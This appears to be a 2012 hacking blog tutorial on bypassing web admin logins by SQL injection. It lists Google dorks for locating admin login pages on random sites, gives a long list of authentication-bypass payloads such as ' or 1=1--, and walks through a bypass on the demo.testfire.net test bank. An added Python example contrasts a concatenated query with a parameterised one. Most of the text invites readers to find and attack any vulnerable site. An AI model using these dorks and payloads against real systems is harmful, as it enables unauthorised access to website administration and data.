Thursday, August 16, 2012

How to exploit a web application by SQL Injection Attack


Hello Readers, today I am sharing with you how to exploit a web application by SQL Injection Attack. In this post I show you, step by step, how an admin login can be bypassed using a few crafted queries.

What is SQL Injection?

SQL Injection is a code injection technique that exploits a security vulnerability in the database layer of an application. The vulnerability is present when user input is incorrectly filtered for string-literal escape characters embedded in SQL statements, or when user input is not strongly typed, so that it is unexpectedly executed as part of the query. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.



Step-by-Step tutorial for SQL Injection

[Step – 1] Find an SQL Injection Vulnerable Website


First we need a vulnerable site to attack. This is the first step in SQL injection exploitation and, as with every other attack, it is the most time-consuming step; in fact it is the only time-consuming step.

1) By Google Dork

Google dorks are the center of Google hacking. Google's index is the biggest there is, so attackers use various search engine operators and complex search queries against it to locate sensitive data and vulnerable devices on the internet. For example, the Google dorks below turn up random websites that may be vulnerable to SQL injection.

There is a large number of Google dorks for basic SQL injection. Here are the most common ones:


inurl:admin.asp

inurl:login/admin.asp

inurl:admin/login.asp

inurl:adminlogin.asp

inurl:adminhome.asp

inurl:admin_login.asp

inurl:administratorlogin.asp

inurl:login/administrator.asp

inurl:administrator_login.asp

2) By Automated Tools

Today many tools are available for finding a vulnerable site. Tools make the work easy and save time. Admin page finder tools scan websites for administrator login pages, using a predefined list of common paths. After finding such a page, the tool presents the page on which one can log in with the administrator password. "Actually, finding the admin page is nothing but finding a particular directory of a website."

You can use the Admin Finder script (a Perl script). I shared this script in my previous post; you can get the script there and follow that tutorial.
[Step - 2] SQL Injection Queries

Here is a list of popular SQL injection strings. We can use these to bypass login authentication. They work by changing the logic of the SQL query that the application builds from our input.


'or''='

admin'--

' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --


[Step – 3] Exploiting Web Applications by SQL Injection

After finding the admin page of a vulnerable web application, we can exploit it using client-supplied SQL fragments. This enables the execution of unauthorized SQL commands.

For example, when a user logs onto a web page using a user name and password, an SQL query is used for validation. However, an attacker can use SQL injection to send specially crafted username and password fields that poison the original SQL query.


Let's see an example that illustrates this kind of attack so that we can fully understand how it works. We have an SQL-injection vulnerable website:

http://demo.testfire.net/bank/login.aspx

We found an SQL injection point for exploitation. In the image below we can see the login page, or user authentication form, of this website.

www.demo.testfire.net has an authentication form for accessing the administration part of its website. The authentication requires the user to enter a valid username and password. After the username and password are sent, the application sends a query to the database to validate the user.

The query has the following format:


SELECT *
FROM admin
WHERE username = '[USER ENTRY]' AND password = '[USER ENTRY]'
The application doesn’t perform any sanitization of the received data, and therefore we have full control over what we send to the server. The authentication form requests a username and a password from the user. If we enter any random username and password the result page shows an “Invalid username or password” message.


The authentication requires the user to enter a valid username and password. We don't know a valid username and password, so we inject an SQL fragment here to bypass the login. In the username field we type admin, and in the password field we enter 'or''=' (ASCII single quotes).

The query has the following format:


SELECT *
FROM admin
WHERE username = 'admin' AND password = ''or''=''

If the query runs successfully we bypass the login without knowing the password: the WHERE clause now reads (username = 'admin' AND password = '') OR ('' = ''), and the second half is always true. In the image below we can see that we have bypassed the login and are using the admin panel as an administrator, where we can manage the website's contents as we want.
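
To make the mechanism concrete, here is an added example (not code from the original post or from the demo site) that rebuilds the admin check two ways against a constructed in-memory SQLite table: once by string concatenation, as described above, and once with bound parameters, which is the fix. The table name, column names and stored password are assumptions for the demo.

```python
import sqlite3


def make_db():
    """Constructed sample table standing in for the site's admin table (assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES ('admin', 'S3cret!')")
    db.commit()
    return db


def vulnerable_login(db, username, password):
    """Builds the query by concatenating user input, as the post describes.

    With the password 'or''=' the statement becomes
      ... WHERE username = 'admin' AND password = ''or''=''
    and because AND binds tighter than OR, the database evaluates
      (username = 'admin' AND password = '') OR ('' = '')
    which is true for every row, so a row comes back and the login succeeds.
    """
    query = ("SELECT * FROM admin WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return db.execute(query).fetchone() is not None


def safe_login(db, username, password):
    """Same check with bound parameters: the driver passes the input as data,
    so quote characters in it can never change the statement's structure."""
    row = db.execute(
        "SELECT * FROM admin WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    injected = "'or''='"  # the bypass string from the post, ASCII quotes
    print("concatenated, injected password:", vulnerable_login(db, "admin", injected))
    print("parameterised, injected password:", safe_login(db, "admin", injected))
    print("parameterised, real password:", safe_login(db, "admin", "S3cret!"))
```

The same function also shows why the `' or '1'='1` variants in the list above work against the concatenated version, while the parameterised version only ever matches the stored password.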
* In my next post we will discuss Blind SQL Injection.
source : http://www.invisiblehackers.in